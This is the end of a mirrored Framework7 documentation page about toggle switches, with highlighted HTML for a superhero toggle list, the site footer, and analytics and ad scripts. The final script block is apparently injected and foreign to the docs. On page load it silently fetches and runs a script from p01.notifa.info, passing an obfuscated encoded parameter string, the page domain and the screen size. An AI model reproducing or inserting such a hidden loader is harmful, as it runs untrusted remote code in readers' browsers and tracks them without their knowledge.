      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Spiderman (Disabled)<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init disabled<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Ironman (Disabled)<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init toggle-init<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span> <span class="token attr-name">checked</span> <span class="token attr-name">disabled</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Thor<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init color-orange<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span> <span class="token attr-name">checked</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Wonder Woman<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init color-pink<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>ul</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span></pre></code>
</div>
</div>
</div>
</main>
<footer>
<div class="center">
<div class="links">
<div class="links-block">
<div class="links-block-title">Project</div>
<ul>
<li><a href="../../external.html?link=https://github.com/framework7io/framework7/releases" target="_blank">Download</a></li>
<li><a href="../../external.html?link=http://framework7.io/contribute/">Contribute</a></li>
<li><a href="../../external.html?link=http://framework7.io/sponsors/">Sponsors</a></li>
<li><a href="../../external.html?link=http://blog.framework7.io/" target="_blank">Blog</a></li>
<li><a href="../../external.html?link=https://github.com/framework7io/framework7/blob/master/CHANGELOG.md" target="_blank">Changelog</a></li>
</ul>
</div>
<div class="links-block">
<div class="links-block-title">Docs</div>
<ul>
<li><a href="index.html">Framework7 Core / API</a></li>
<li><a href="../../external.html?link=http://framework7.io/vue/">Framework7 Vue</a></li>
<li><a href="../../external.html?link=http://framework7.io/react/">Framework7 React</a></li>
<li><a href="dom7.html">Dom7</a></li>
<li><a href="../../external.html?link=http://idangero.us/template7/" target="_blank">Template7</a></li>
<li><a href="../../external.html?link=http://v1.framework7.io/">Framework7 v1</a></li>
<li><a href="../../external.html?link=http://v2.framework7.io/">Framework7 v2</a></li>
</ul>
</div>
<div class="links-block">
<div class="links-block-title">Resources</div>
<ul>
<li><a href="../../external.html?link=http://forum.framework7.io/" target="_blank">Community Forum</a></li>
<li><a href="../../external.html?link=http://framework7.io/tutorials/">Tutorials</a></li>
<li><a href="../../external.html?link=http://framework7.io/templates/">Templates</a></li>
<li><a href="../../external.html?link=http://framework7.io/plugins/">Plugins</a></li>
<li><a href="../../external.html?link=http://framework7.io/showcase/">Apps Showcase</a></li>
<li><a href="../../external.html?link=http://framework7.io/icons/">Framework7 Icons</a></li>
</ul>
</div>
<div class="links-block">
<div class="links-block-title">Connect</div>
<ul>
<li><a href="../../external.html?link=https://twitter.com/framework7io" target="_blank">Twitter</a></li>
<li><a href="../../external.html?link=https://github.com/framework7io" target="_blank">GitHub</a></li>
<li><a href="../../external.html?link=https://facebook.com/framework7io" target="_blank">Facebook</a></li>
</ul>
</div>
<div class="footer-sponsors">
<div class="footer-sponsors-title">Sponsored by</div>
<div class="bsarocks bsap_692e54a1f79f00fb913f5a1c3ec9eaa5" id="bsap_1306028"></div>
</div>
</div>
<div class="copy">
<div class="copy-left">
<p>Code licensed under <a href="../../external.html?link=https://github.com/nolimits4web/Framework7/blob/master/LICENSE" target="_blank">MIT</a></p>
<p>2016 © Framework7 is brought to you by <a href="../../external.html?link=https://twitter.com/nolimits4web" target="_blank">Vladimir Kharlampidi</a> from <a href="../../external.html?link=http://idangero.us/">iDangero.us</a>.</p>
</div>
<div class="copy-right">
<p>Proudly supported by <a href="../../external.html?link=https://www.keycdn.com/" class="keycdn-link" target="_blank"><img src="../../external.html?link=http://cdn.framework7.io/i/keycdn-logo.svg" alt="KeyCDN" title="KeyCDN" class="keycdn-logo"></a></p>
</div>
<div class="clearfix"></div>
</div>
</div>
</footer>
<script src="../../cdn.jsdelivr.net/algoliasearch/3/algoliasearchLite.min.js"></script>
<script src="../../cdn.framework7.io/js/jquery-1.11.0.min.html"></script>
<script src="../../cdn.framework7.io/js/main.html"></script>
<script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
      
      ga('create', 'UA-74282934-1', 'auto');
      ga('send', 'pageview');
    </script>
<script>
      (function(){
        var bsa = document.createElement('script');
           bsa.type = 'text/javascript';
           bsa.async = true;
           bsa.src = '../../s3.buysellads.com/ac/bsa.js';
        (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);
      })();
    </script>
<script src="../../m.servedby-buysellads.com/monetization.js" type="text/javascript"></script>
<script>
      (function(){
        if(typeof _bsa !== 'undefined' && _bsa) {
        _bsa.init('default', 'CKYD627I', 'placement:framework7io', {
          target: '.bsa-cpc',
          align: 'horizontal',
          disable_css: 'true'
        });
          }
      })();
    </script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bd4m%2bO%2f9ESaHYLTbt4%2b5eB%2bjCPus6b5oMA22uxtx4By3wdtQBst6OBdHv5RlcXnL6nME9T%2f7%2fzj07lrWtGeARPP3rlc9t6QK9F1CIvVusvlEKJsaL2wQ7bB27FfzWzid5L2z09hd%2fgz4DU8rMLTEoQgMSdaaCgNvh%2b6aQhitfsKJlzXIkkrap%2bnA4F0j2s5BaUhsww6Vy0VEk81TBF4f010%2flnxtHEobOynrOZWh%2fmP8hxG3XomXhPj8lha4zEmCeBycCmyJ3CuU70oaHiUD5md2tqZCLr3VDM2aK0zPmBOx8apZJI2CiT3A00gkd2M67FWmdI7eNdKKFCD55U3e7uA9BTymDC1JE33xnTJbhyyC9auoJ%2bGJpXUslecCSBCWEiA2y%2f9plE8oX9Tsj24SX9CMxXDGI%2fPpzDdDUVZcJAe7TNOUWrZY6Eg22hpz7F0FjijJiDRBh4WHJNDOQzj%2fUd9los7J1br%2bJl" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from framework7.io/docs/toggle.html by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 16 Oct 2018 03:57:33 GMT -->
</html>